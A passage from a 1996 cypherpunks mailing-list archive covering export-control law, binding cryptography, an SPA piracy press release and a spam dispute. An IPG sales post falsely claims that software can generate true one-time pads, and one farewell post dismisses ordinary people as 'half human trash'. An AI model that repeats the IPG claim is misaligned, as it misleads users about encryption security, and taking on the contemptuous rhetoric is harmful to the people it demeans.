overstepping their bounds. (As it may do, some day. Not this term,
obviously. "Pro-Code" got tabled, so Congress effectively spoke.)

(Understand that I am not arguing in favor of the ITARs, nor their
application to crypto, just taking issue with Marshall's opening point that
the ITARs are not real laws. I mostly believed they were real laws before,
but Greg Broiles' analysis several weeks ago cinched it for me.)

I don't have the time right now to respond to the rest of Marshall's
letter, though I agree with his basic sentiments.

--Tim May





"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scrappo.reverb@juno.com (Psuedo Nym)
Date: Wed, 16 Oct 1996 19:47:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: rival Clipper products
Message-ID: <19961016.162913.7943.0.scrappo.reverb@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



What somebody needs to do is make a rival for
Clipper products. I propose that somebody with
enough money should have a Clipper-type chip
implementing Triple-DES or whatever developed
and marketed. They should do the same things,
except not be restricted by the government
(obviously this wouldn't be for export) by the means
of using weak crypto. These devices could probably
be marketed to the same audience that Clipper
products are aimed at, i.e. the general unsuspecting
populace. The only problem I could see would be
educating whoever buys into how the government
is pulling the wool over their eyes. I'm sure with
some funding from a major source, or some
donation of time/supplies from a manufacturing
company, it could be pulled off in grand fashion.
Who said we can't play the government's little game?

This along with some "Big Brother Inside" stickers
massively propagated, and it might fly. Any insights?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Verheul <everheul@NGI.NL>
Date: Wed, 16 Oct 1996 08:21:11 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: AW: (Fwd) Binding cryptography - much work, little point ?
Message-ID: <01BBBB80.CB67B500@port11.ztm.pstn.rijnhaave.net>
MIME-Version: 1.0
Content-Type: text/plain


>peter.allan@aeat.co.uk (Peter M Allan) wrote:
>[skip]
>I suspect the scheme is incomplete anyway.  After skimming the web page I
>see that the aim is to show the same session key has been encrypted under
>different ElGamal pubkeys.  Now who's to say those pubkeys belong to anyone ?
>Or is this what is meant by "such as Margaret's identity" ?  You'd list the
>ids of the TRPs and also prove that the pubkeys used were theirs ....  ?
>
One can imagine that included in the certified key of a TRP is a statement
like "PKI-ROLE = Trusted Retrieval Party". As it is certified by a higher order (e.g. a root of the PKI) it can be verified. 

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Sutherland <seans@pobox.com>
Date: Wed, 16 Oct 1996 17:35:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SPA's Press Release
Message-ID: <19961016221000468.AAA176@maverick>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Oct 16 17:11:03 1996
After researching the SPA's lawsuit for awhile, I figured I might as well post 
the SPA's press release regarding their lawsuit against C2 to see if it'll spur 
some more discussion on it.  If it weren't for the seriousness of the matter, I 
would almost be amused by the SPA's lawsuit.  Their term, "contributory 
infringement" is almost like suing the bartender because a customer got into a 
wreck while drunk.  Note the "should have nown." Here's their specification for 
this, copied from http://www.spa.org/piracy/risk.htm.

"Anyone who knows or should have known that he or she is assisting, inducing or 
materially contributing to infringement of any of the exclusive rights by 
another person is liable for contributor infringement. "
ie -
     posting of serial numbers 
     posting of cracker utilities 
     linking to FTP sites were software may be unlawfully obtained 
     informing others of FTP sites were software may be unlawfully obtained 
     aiding others in locating or using unauthorized software 
     supporting sites upon which the above information may be obtained 
     allowing sites where the above information may be obtained to exist on a  
     server 

Then there's their Vicarious Liability for Infringement by Another Person, 
outlined by:

"Anyone who has the authority and ability to control another person who 
infringes any of the exclusive rights and who derives a financial benefit 
therefrom, is vicariously liable for the infringement of another person."
ie -
     ISPs who have warez or pirate sites on their system 
     ISPs who have pirates for customers 
     sys admins for newsgroups or IRC where pirate activity takes place 

It's interesting to note that this web page is entitled "Theories of Copyright 
Infringement", and the only listing (which I didn't copy) which references a 
law (section 501(a) of the Copyright Act, to be exact) is direct infringement 
- -- the kind we all know and love.  I'm curious, do the Contributory Infringment 
and the Vicarious Liability for Infringment By Another Person claims have any 
legal basis, or are they just the inane rantings they appear to be? 

In a fair world, this wouldn't stand up in court...but unfortunately, with 
juries today...you get the point.  Anyway, here's their press release, again a 
direct cut from http://www.spa.org/piracy/releases/netpir.htm.

- ----------

SPA Files Copyright Suits Against ISPs and End Users
Internet Anti-Piracy Campaign Launched 

(Oct.10, 1996 --Washington, D.C.) -- The Software Publishers Association (SPA) 
announced today that it has filed five civil lawsuits for copyright 
infringement occurring on the Internet. Three of the lawsuits were filed 
against Internet service providers (ISPs), and the remaining two were filed 
against individual end users. Additionally, SPA launched its Internet
Anti-Piracy Campaign, which includes education and enforcement components, in 
an effort to educate and work cooperatively with ISPs regarding copyright 
infringement. 

ISP lawsuits were filed on Oct. 7 and 8 against Community ConneXion of Oakland, 
Calif.; GeoCities of Beverly Hills, Calif.; and Tripod Inc. of Williamstown, 
Mass. The SPA members named as plaintiffs in all three suits were Adobe Systems 
Inc., Claris Corp. and Traveling Software Inc. In each case, SPA first 
contacted the ISP and requested that the infringing material be removed, but 
the ISP failed to respond and cooperate. 

SPA also filed suit against Jeffrey Workman of Auburn, W. V., and Patricia 
Kropff of Scottsdale, Pa, on behalf of Adobe Systems Inc., Claris Corp., Corel 
Corp., Datastorm Technologies Inc. and Novell, Inc. In each of these instances, 
SPA received reports of alleged copyright infringement on certain Web sites, 
and with the assistance of the ISPs, tracked the individuals responsible for 
posting the infringing material. 

"These lawsuits send a clear signal to ISPs and end users that neither direct 
nor contributory copyright infringement will be tolerated. The Internet does 
not provide a safe haven for these types of activities," said Ken Wasch, SPA 
president. 

SPA's Internet Anti-Piracy Campaign (IAPC), which is outlined at 
http://www.spa.org/piracy/iapc.htm, contains information explaining why ISPs 
may be liable for copyright infringement, the risks involved and seven warning 
signs that infringing activity may be taking place on the ISP's server. 
Additionally, ISPs may sign an ISP Code of Conduct to show they have adopted
the operating practices encouraged under the copyright law. 

Upon receiving a report of alleged copyright infringement on the Internet, SPA 
confirms the unlawful activity and sends a letter to the ISP servicing the 
infringing user. In most cases, the ISP cooperates and remedies the situation. 
If the infringing user can be identified -- as alleged in the Workman and 
Kropff cases -- SPA may then choose to seek action against the end user. If the 
ISP is unwilling to stop the unlawful activity, SPA may choose to file suit 
against the ISP. 

"Our intentions are to work cooperatively with ISPs. A key element of the IAPC 
is the ISP Education Program devoted to alerting ISPs to their potential 
liability and providing them with the tools and guidance to protect 
themselves," said Joshua Bauchner, SPA's Litigation Coordinator. 

"The IAPC maintains SPA's traditional balance between education and 
enforcement. We first make contact in an effort to amicably resolve the matter, 
and only when absolutely necessary do we turn to litigation." 

An integral part of the cooperative effort between SPA and ISPs is the ISP Code 
of Conduct. This simple agreement asks that ISPs protect themselves from 
liability by stopping pirate activity on their systems. In return, SPA will 
attempt to contact the ISP if it receives a piracy report concerning it -- 
before initiating other action. 

Piracy has taken many forms on the Internet. These include making unauthorized 
copies of software available for download, the posting of serial numbers, 
cracker and hacker utilities and links to pirate FTP sites. Although many 
believe piracy is limited to "warez" or illegal copies of software, it extends 
beyond that narrow definition. Under the law, anyone who knows -- or should 
have known -- of the infringement and who assists, encourages or induces the 
infringement is liable for indirect infringement. In each of the actions SPA 
filed, at least two of the above infringements were present. 

For additional information please visit the Internet Anti-Piracy Campaign site 
at http://www.spa.org/piracy/iapc.htm. The ISP Education Program information is 
available at http://www.spa.org/piracy/ispinfo.htm. To report a case of piracy 
please contact SPA's hotline at (800) 388-7478, piracy@spa.org or complete an 
on-line intake form at http://www.spa.org/piracy/pirreprt.htm. 

SPA is the leading trade association of the desktop software industry, 
representing the leading publishers as well as many start-up firms in the 
business, home office, consumer, education and entertainment markets. Its 1,200 
members account for 85 percent of the sales of the U.S. packaged software 
industry. SPA press releases are available through fax on demand at
(800) 637-6823. 

- ---end bs
- ---
Sean Sutherland         | GCS/C d- s+:+ a--- C+++ V--- P L E- W++ N++
PGP Key ID: E43E6489    | K- w o O-(++) M--  V PS+ PE++ Y++  PGP++(+)
http://pobox.com/~seans | t--- 5+++ X++ Rb++ DI+ D+ G e- h! !r y
            In UNIX, no one can hear you scream.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMmVdeVZoKRrkPmSJAQHVQQf+O07bjV9CDzKPTzOcSpKNlmtUqE0dUD9R
gM1nce4LkG+6xszwt81srAwEmMdFtxe2gF0udB95n1okI5ZYYf9YAqpStXKScdZZ
QYb8LpaBoxQFlN1t66m6Hy5VXyx/EKjLYYWGWdvLxKIcxMqvvbx7wym3CHdj0iFq
1chg6s6MVFegFXT7l2EEOlHSkloz4/0fl8v63yXUZDyqd0H6PV05JsfC9vkGWVV1
yXC51nKq29ps5LB8Cm61intpfnDOYtq+ZN1EO91+9CDttDyLgJM1/HMA6HnbgGG8
CVc52Kw0JtahXi7cxKNmSuI1F9YEq00bNTqTqARzKAvha+5mWRZ8Iw==
=AuZp
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 16 Oct 1996 08:28:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Comments on binding cryptography (1)
Message-ID: <7E159360C2E@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


Apologies for not reacting earlier; I have been away for six days.
I found many reactions to the posting on binding cryptograhpy 
in my mail box, which I have read with interest. 
Here are my comments, excuse me if they are lengthy.

First and foremost, I want to stress that the proposal primarily 
addresses the issue of providing information security. It does not 
want to solve the problem of criminals using encryption.

I hope the following analogy may clear this (but please don't stretch
the analogy too far).
The government wants to offer citizens good transport, so they make 
public roads. Because some citizens endanger others through drunk 
driving, the government makes the rule that if you want to drive a 
car, you must be sober. If you want to drive on the public road, fine, don't 
drink. If you want to drink, fine, take a bike or cab or use public 
transport.

Now, the binding cryptography proposal wants to provide law-abiding 
citizens with good crypto. (I'm currently not using any, because I 
don't have an easy to use and reliable system.) A government may 
establish an infrastructure for good crypto (like the public roads), 
with the requirement that you keep to the "binding" rule (like "don't 
drive drunk"). If you don't want to use the binding cryptography, 
fine, use another system (take a bike or cab). The system will not 
prevent criminals from using cryptography - it isn't meant to. 
Yes, criminals can use superencryption or other (mutually agreed upon) 
ways to use the system and yet be out of law-enforcement's reach, 
but they might as well use PGP in the first place. I do not want to see PGP 
outlawed, and I do not want to have PGP use be regarded as 
suspicious (just as I don't think it is suspicious if you take a cab 
late at night). Setting up a good information security structure can 
very well be compatible with having other means of information 
security. 

You ask why should the government offer good crypto, when it's 
already available? I think that cypherpunks are not average - they 
know about crypto and they can use it. The majority of the citizens, 
however, do not use crypto, because they don't understand it and 
because there's no easy-to-use and reliable standard. If the 
government were to offer this, it would make a difference to many 
people.

Then, you say, it affects my privacy. As far as I see it, it does 
not. The binding cryptography system allows regular monitoring for 
compliance (like road police checking whether people are sober). It 
does not involve reading of messages. The only time messages are read 
is when law-enforcement agencies (LEAs) have a warrant and ask a TRP 
to hand over a session key. This is not fundamentally different from the 
present situation, where LEAs can wiretap with a warrant. Privacy 
will be protected more or less to the same extent as presently.

If you don't agree with governments having the possibility of 
intercepting communications anyway, OK, that's your opinion. I have 
another opinion, and we needn't discuss further - this is not the 
issue.

Then, if you say you don't trust your government, OK, I can see a 
point. Generally, I notice a difference between US and Europe in our 
views on the role of governments. That is legitimate, and something 
for each to discuss domestically. 
(Yes, Alex, IRT-gate is a good point, but at least it has led to a critical 
investigation by parliament and a more critical attitude with our 
judges in judging investigation methods.)
(And Allen, if binding cryptography helps totalitarian governments in 
arbitrarily monitoring all communications, I oppose this. China uses 
video cameras in Lhasa to monitor potential demonstrations of Tibetans. 
I oppose this, and I blame the Chinese government for it, not the 
inventor of video cameras.)

I feel at least that allowing TRPs to decrypt single communications 
if the LEA has a court warrant is better protection than escrowing my 
private key with the government. Also, choosing your own TRP allows 
you better protection than having to use a government-chosen one. On 
the other hand, I think there should be some regulation on TRPs, if 
only to address liability issues. I think a government certification 
of TRPs would not be a bad thing, if this is done in an open, 
flexible and preferably independent way - for instance a 
semi-govenmental "TRP approving authority" (the same way we have data 
protection authorities who monitor compliance with data protection 
legislation). Again, we may have different opinions on this given the 
difference between US and Europe.

Someone pointed out that a TRP could be corrupted and collaborate 
with the law-enforcement agencies. Then, all sessions would be read 
by the LEA. Indeed, this is a threat to be taken into account. At 
least the binding alternative is better protection against 
collaborating TRPs than key-escrow, as at least it leaves 
communications from before the corruption unharmed. Moreover, the 
system allow easy change of TRP, so the moment you notice something 
weird about this TRP, you choose another one. It's really a matter of 
trust.

Finally, I get the impression that some cypherpunks feel the 
law-enforcement problem to be a problem of "them" as opposed to us. I 
- and this is my personal opinion - feel it is "my" problem as well. 
I live in a society with which I am generally satisfied, not the 
least because we have a rule of law. Tracing criminals is my concern 
as well. I am not happy that, in some ways, I have to give up some 
freedom, but I think it is worth while. I would not mind using a 
government-offered crypto system that uses binding cryptography. All 
I want is that it is a good system and I want to be sure I trust my TRP.
I would prefer it if no such system were needed, but if it helps in 
protecting me from criminals, I can live with it.

Bert-Jaap

---------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law, Administration and      facs    +31 13 466 8149
Informatization, Tilburg University     e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://cwis.kub.nl/~frw/people/koops/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 16 Oct 1996 08:42:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Comment on binding cryptography (2)
Message-ID: <7E197D845BB@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back wrote:
>Hey Bert-Jaap, I had you down as one of the good guys, what caused you
>to fold :-)

It's nice to hear I was listed as a good guy. Maybe I can regain some 
credit if I explain why I co-published the binding cryptography 
proposal ;-).

I haven't yet made up my mind how the crypto problems for law 
enforcement are to be addressed. It's my Ph.D. subject, and all I can 
say at present is that the issue is complex.

That is why I want there to be as much information on the issue as 
possible. I don't say I agree with key-escrow, GAK or binding crypto, 
nor with demanding a suspect to decrypt, but I want to know all there 
is to know before I make up my mind. 

Having a new proposal helps putting things into perspective. At least 
the binding crypto proposal shows (as other proposals have) that 
there's no need to escrow your private keys, and that's a point.
Also, as I said in my first comments, binding crypto isn't meant to 
solve the crypto problem, it is "merely" meant to provide a 
trustworthy crypto system with some safeguard. 

Finally, to my mathematician's sense of aesthetics, binding crypto 
is an elegant proposal. It merits publication in its own right. Not 
because I think it should be established, but because I think it 
should be known.

Bert-Jaap

---------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law, Administration and      facs    +31 13 466 8149
Informatization, Tilburg University     e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://cwis.kub.nl/~frw/people/koops/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Wed, 16 Oct 1996 16:23:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CyberPromo responds!
Message-ID: <HB5eZDvcwapi@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

A helpful cypherpunk provided a list of addresses for various postmaster
and root accounts in cyberpromo.com.  I am now sending my abuse response
to

wallace@cyberpromo.com
cyberpr@ANSWERME.COM
root@savetrees.com
postmaster@savetrees.com
root@answerme.com
postmaster@answerme.com
root@NS3.CYBERPROMO.COM
root@NS4.CYBERPROMO.COM
postmaster@NS3.CYBERPROMO.COM
postmaster@NS4.CYBERPROMO.COM

and it's actually generating responses.  So far, Sanford Wallace has
missed my point several times, assumed that I have been sending mail to
the replybot when I have repeatedly stated the reverse, admitted that
"someone is spoofing requests from your domain" and threatened to bill
$1000 for "reviewing frivolous bills".  It appears I at least have his
attention.

This is only slightly related to the list (via the redirection of the
list to Wallace's replybot).  If anyone wants to discuss CyberPromo
tactics further, please do it via private mail.  If enough of us want to
talk about it, I'll set up a little list for the purpose.
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
DNRC Minister Plenipotentiary of All Things Confusing, Software Division
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmVrMxvikii9febJAQGvBwP/WwtrXXFNWvJLIXYcIkrm12ZAaJZwn76e
T6xY4IeJw5zYD73iYYYBcU4k6iR4GQR4ZRyKKRDKSqLXuXD0iXcrXG0LWoAtl/9w
nKjPe83hiNYPCQIDwryTb3BZTkXBltTLh9VWjFSTMx7AbYg89mxvNrEPhbtevkIC
TRwGZ7q2WF0=
=TN2R
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 17 Oct 1996 07:44:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Goodbye
Message-ID: <199610171444.HAA07281@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Goodbye

I am leaving cypherpunks for a while, perhaps forever.

Why should anyone handle a high volume list as a list and not
as a newsgroup?  Our tools for handling newgroups are superior
to our tools for handling mailing lists.

The reason to prefer mailing lists is that the very
inconvenience keeps out the ignorant masses.  Word initially
spreads person to person, and intelligent and highly motivated
people make most of the contributions, 

Thus the glory days of cypherpunks, an insider club of the best
and brightest, far superior to the common herd, where we planned and
organized for a world where the ignorant masses can no longer
rob and harass their superiors, a world where the elite can
live the good life in freedom and comfort and abandon the
useless worthless masses to wander blindly into ruin, despair,
and slavery, lost in a world they cannot understand, and will
no longer have the power to smash.

In those days we forged the weapons and planned the strategies,
defending the net against the enemies of freedom.

But with the passage of time, we got the same half human
trash as you encounter in the newsgroups, and less satisfactory
tools to filter them. 

The glory days are long past, and cannot be revived by forming
a new mailing list.

Perhaps I will see you guys on Usenet, by and by.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Miller <jim@suite.suite.com>
Date: Wed, 16 Oct 1996 19:33:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Comments on binding cryptography (1)
Message-ID: <9610170233.AA01510@suite.com>
MIME-Version: 1.0
Content-Type: text/plain



Bert-Jaap Koops  writes:

> It does not  want to solve the problem of
> criminals using encryption.
>

Then he comments on binding cryptography.  Then he concludes with:

> I would prefer it if no such system were needed, but if it
> helps in  protecting me from criminals, I can live with it.
>

Feeling any cognitive dissonance, Mr Koops?

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Wed, 16 Oct 1996 14:39:30 -0700 (PDT)
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: [NOISE] I never knew that Dimitri Vulis was a net.legend
In-Reply-To: <Pine.SCO.3.93.961016133809.11688G-100000@grctechs.va.grci.com>
Message-ID: <Pine.3.89.9610161935.A1419-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Oct 1996, Mark O. Aldrich wrote:
> While the message blew by a little while ago (and I didn't save it),
> someone had posted a URL with information about Dimitri's sordid/alleged
> past on the Net.  At roughly the same time, I ran across (by accident) a
> URL that lists Dimitri as a "net.legend" and offers yet another
> perspective.  Apparently, Dimitri is far more well known that any of us
> (at least me) gave him credit for.  The notion that the idiom "dandruff
> covered" is indicative of anti-semitism is one passage that I found rather
> amusing.
> 
> Check it out for yourself at
> http://www.math.uiuc.edu/~tskirvin/home/legends/legends3.html
> 

The above is very good, but there's not nearly as much on Vulis in it. 
For anyone else who may have missed it, here is the original link again:

http://www.math.harvard.edu/~verbit/scs/cranks/from-Shlomo.html#vulis

This one absolutely_boggles_my_mind.  But check them both out.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 16 Oct 1996 20:13:46 -0700 (PDT)
To: "Timothy C. May" <stan_gibson@zd.com
Subject: Re: Your editorial in the 10/14 PCWeek
Message-ID: <199610170312.UAA03693@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:37 PM 10/16/96 -0800, Timothy C. May wrote:
>>A) This is not a change in the law. There is no law regarding export of
>>encryption software.
>>Congress has never passed any such law. These are State Department
>>regulations, and presidential decrees. These regulations, which have the
>>force of law to you and me, were never debated or voted upon by our
>>elected representatives. They can be changed tomorrow the same way. In
>>fact, they can be changed and the public need not even be notified.
>
>Actually, as Greg Broiles pointed out in an article (on the Cypherpunks
>list) several weeks ago, Congress deliberately chooses to delegate much
>regulatory authority to other agencies. There just is not enough time or
>expertise for them to pass specific laws covering the number and size of
>trashcans in the national parks, the type of equipment to be used on Navy
>ships, and so on. The State Department--and soon to be transferred to
>Commerce--has the regulatory authority to decide which exports are covered
>by the International Trafficking in Arms Regulations, the ITARs. These
>rules effectively have the full force of law, as many tens of thousands of
>laws not specifically passed by Congress have.

I think this is more than a little misleading.  While I don't recall the 
specific note from Greg Broiles you mention, as I recall from other sources 
so-called "government regulations" were not considered binding on ordinary 
citizens before the 1930's.  The examples you gave ("number and size of 
trashcans in the national parks [public property], and type of equipment to 
be used on Navy ships...") are both issues of controlling the activities 
government employees and departments, not ordinary citizens!

It's hard for me to imagine how anyone could consider this distinction 
sufficiently ignorable as to provide examples as if they were 
interchangeable.  It seems pretty obvious that governments should be able to 
control their own employees and departments, at least while they're on the 
job, in the same way that essentially every other employer does.  Yet, it is 
equally obvious that ordinary citizens aren't in the same position as 
government employees, and there is no reason to assume that the former are 
to be bound by rules which had applied only to the latter.  For just one 
example, government employees can resign; citizens cannot.

It will be claimed that citizens do have to obey the rules:  Yes, but 
they're called "laws," they are passed by legislators who are voted in or 
out of office by the citizens. (And laws apply to government employees too, 
or at least they should...)   Laws are also publicly debated before they are 
passed, generally.   On the whole, I would say that there is an excellent 
reason for this healthy distinction between "laws" and "regulations."

You stated that it would be difficult for Congress to debate a large number 
of rules, and you cited "national parks" and the Navy as examples. It 
wouldn't be easy for Congress to handle this.   My answer is, yes, 
delegation of these matters is reasonable precisely because they are NOT 
binding on ordinary citizens.   And further, I'd point out that assuming you 
have respect for freedom, you have every reason to fear allowing things with 
the force of laws to be passed as "easily" as regulations.  

Some people who say they are REAL LAWYERS (TM) will probably claim, as if on 
schedule, that I am re-writing the law.  No, I am well aware that the SC may 
have, at some point, have disagreed.  Rather, I think we should treat the 
Supreme Court, on this issue as well as many others, as we would a 
schizophrenic person that we happen to meet on a city street:  We don't 
think his mumbling is making any sense, but we are well aware of the danger 
of provoking him so we hold our tongues while in his earshot.  Nevertheless, 
we don't for a minute adopt the opinion that anything we've heard is somehow 
more worthy of belief, simply because we felt uncomfortable about expressing 
our opposition for a moment, which is analogous to the SC being able to 
temporarily enforce its opinion.

I certainly sympathize with the REAL LAWYERS (TM).  They are, in effect, 
chained 24 hours per day (so to speak) to that schizophrenic, and can never 
get away, so they've decided to make a virtue (and, in fact, a business) out 
of a necessity by adjusting their beliefs to correspond, continuously, to 
the ravings of that madman.   Naturally, they pride themselves on being able 
to slowly, gently, carefuly change the opinions of that madman, and they 
succeed occasionally at this task.  


>(It is true that the ITARs may well end up being overturned by the courts,
>as the Bernstein and Junger cases proceed, but this could happen to laws
>passed by Congress, and does.)
>Also--and I am not an expert on this--some of the basis of the ITARs is
>closely related to the "Munitions Act," which was, I am almost certain, an
>actual Act of Congress, some decades back.

OTOH, one of the big complaints we have against ITAR is that it seems to be 
constantly re-interpreted.  While I certainly won't claim that this is never 
true of Congress-made laws, it tends to be more difficult to pass a law, and 
once passed, to sneak a new interpretation in.  Somehow, I don't  think that 
it would have been possible to stretch a "Munitions Act" into a rule which 
would prohibit the export of a a Web-browser like Netscape that happens to 
have a hole in it for crypto.

>
>Certainly Congress knows full well what the ITARs are about, and could
>change them if it thought the State Department or Commerce Department were
>overstepping their bounds. (As it may do, some day. Not this term,
>obviously. "Pro-Code" got tabled, so Congress effectively spoke.)
>
>(Understand that I am not arguing in favor of the ITARs, nor their
>application to crypto, just taking issue with Marshall's opening point that
>the ITARs are not real laws. I mostly believed they were real laws before,
>but Greg Broiles' analysis several weeks ago cinched it for me.)

How did I miss that miraculous revelation?   B^)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: romana@glamazon.com (Romana Machado)
Date: Wed, 16 Oct 1996 20:02:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: re: Q.E.D.
Message-ID: <v02110100ae8b53e57424@[206.184.133.208]>
MIME-Version: 1.0
Content-Type: text/plain


> You do not need to be an Einstein, a Hawking, or a von
>         Neumann, to understand the fundamental basis of the IPG
>         EUREKA algorithm.
>
...they also laughed at Bozo the Clown.

Romana Machado romana@fqa.com
http://www.fqa.com/romana/ http://www.glamazon.com/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Wed, 16 Oct 1996 18:30:42 -0700 (PDT)
To: coderpunks@toad.com
Subject: Q.E.D.
In-Reply-To: <3261C95B.2F4A@bfree.on.ca>
Message-ID: <Pine.BSI.3.95.961016194535.21030B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



         Some of you have sardonically written to say "Nihil Est
         Demonstrandum," N.E.D. because an OTP must be derived from a
         hardware source, that is, it must be a pure random sequence
         of limitless entropy. Accordingly, they unbashfully assert
         that an OTP generated by a computer program is not possible.

         How do they know that? Does the Bible tell them so, or the
         Koran, or do they get it from the Torah? Why not cite the
         source of their certainty instead of advancing an unsupported
         proposition.  I do not mean to be rude, but excuse me, what
         scientific proof can they offer for that immovable avowal?
         There is no scientific proof whatsoever, none at all, except
         for the words and their steadfast, and maybe self serving,
         postulate.  Accordingly, obviously it is they, not us, who are
         the ones that have "Nihil Est Demonstrandum," in this matter.
         There is not one scintilla of sustainable evidence to support
         such a doctrine.

         While the vast majority of people knowledgeable about
         cryptography have not heretofore believed that it is possible
         for software to produce an OTP, that does not make it a
         scientific fact, but merely means it is the consensus of
         scientific opinion that it is not possible. With all due
         respect to Bruce, and his exceptional work, Paul, Roy and many 
         others who obviously know the subject matter of which we speak, I
         offer that  history is replete with scientists supplying proof of
         the seemingly impossible.

         In support of their position, some have pointed out that John
         von Neumann, to paraphrase, stated that ARITHMETIC cannot
         produce random numbers, a thesis which I agree with; but
         where is that, in any way inconsistent with IPG's position on
         EUREKA?  IPG has produced a system to generate software OTPs,
         albeit it within limited but but more than ample entropy, not
         software random numbers.

         We stipulate the obvious fact that the encryptor stream
         generated by EUREKA is a PRNG stream, though we do consider
         it gross denigration to castigate it as ONLY a PRNG stream.
         It is a PRNG issue that also happens to be an extremely well
         behaved OTP sequence, with limited but ample entropy, as well.
         It meets each and every criteria rationally established for an
         OTP in all reasonable aspects. Subjected to any and all
         statistical analyses, the EUREKA PRNG stream manifests itself as
         being random, though we know, as a scientific fact, that it is
         not.

         To substantiate that posit, and unlike the consensus of
         scientific opinion, obviously N.E.D., that believes that
         software cannot produce an OTP, IPG offers "Quod Erat
         Demonstrandum," Q.E.D. scientific proof that we can produce
         a humungous number of software OTPs sufficient to meet any and
         all current or future requirements.

         You do not need to be an Einstein, a Hawking, or a von
         Neumann, to understand the fundamental basis of the IPG
         EUREKA algorithm. Succinctly as I can , that is, given a truly
         random key of entropy N, and possibly truly random look up tables
         of combined entropy M, it is possible to generate up to N
         streams of characters of a length in this case of
         approximately 10^223, that manifest themselves as true OTPs.

         Think about that simple supposition for a moment. What do we
         mean by an OTP? We mean that an OTP is a stream of
         characters, or numbers, that cannot be derived in the
         absence of the key that was used to generate them, or
         alternately by trying all possibilities of that said key.
         Thus, when using the resultant as an encryptor stream, the
         only information derivable from the ciphertext is the
         determination of the maximum possible length. Furthermore,
         by using the exclusionary proof, you cannot preclude any
         possible message of that said length.

         If you think through that hypothesis, it becomes clear that
         such is not precluded by von Neumann's proffer, or by
         fundamental mathematical principles. The question then, is
         how can you go about doing that? That is all that IPG has
         done.  We have figured out a mathematical certain way, (
         Q.E.D.), of generating N number, or rather a number very
         close to N, of OTPs from a given key of entropy N, and we can
         prove it.

         Not only that, but you can prove it to yourself, Q.E.D.  We
         maintain that it is discernible to any knowledgeable person
         who probes the algorithm, that the only analytical tack that
         can be mounted against EUREKA is brute force and that is
